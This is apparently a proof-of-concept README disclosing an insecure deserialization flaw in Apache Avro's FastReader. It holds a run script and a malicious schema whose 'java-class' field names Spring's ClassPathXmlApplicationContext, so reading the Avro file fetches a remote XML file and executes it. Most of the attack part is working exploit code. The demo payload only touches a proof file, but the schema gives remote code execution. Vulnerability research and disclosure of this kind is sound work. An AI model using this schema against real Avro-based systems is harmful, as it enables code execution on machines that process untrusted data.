| ## Insecure Deserialization in Apache Avro |
|
|
| This is a PoC for insecure deserialization in Apache Avro. |
|
|
| The PoC works against default configs for v1.12.1, and nondefault configurations that enabled `FastRead` since 1.9.2. |
|
|
| Full PoC: |
|
|
| ```bash |
| rm /tmp/proof.txt |
| python3 -m http.server & |
| mvn package && java -jar target/avro_research-1.0-SNAPSHOT.jar |
| kill %1 |
| ls -la /tmp/proof.txt |
| ``` |
|
|
| ### Details |
|
|
| The FastReader does not perform the same security checks that the default |
| reader does. As a result, a schema can specify a `java-class` for string items, |
| similarly to CVE-2025-30065. |
|
|
| FastReader is on by default since 1.12.1, and can be optionally enabled in previous versions since 1.12.0 and 1.9.2. |
|
|
| The following schema makes it so when the avro file is read, the URL within the record |
| is requested and the instructions within it executed. In this example, `malicious.xml` |
| `touch`s a proof file in tmp. Malicious schema: |
|
|
| ```json |
| { |
| "type": "record", |
| "name": "TestStringRecord", |
| "fields": [ |
| { |
| "name": "inner", |
| "type": ["null", { |
| "type": "string", |
| "avro.java.string": "String", |
| "java-class": "org.springframework.context.support.ClassPathXmlApplicationContext" |
| } |
| ], |
| "default": "url:http://localhost:8000/malicious.xml" |
| } |
| ] |
| } |
| ``` |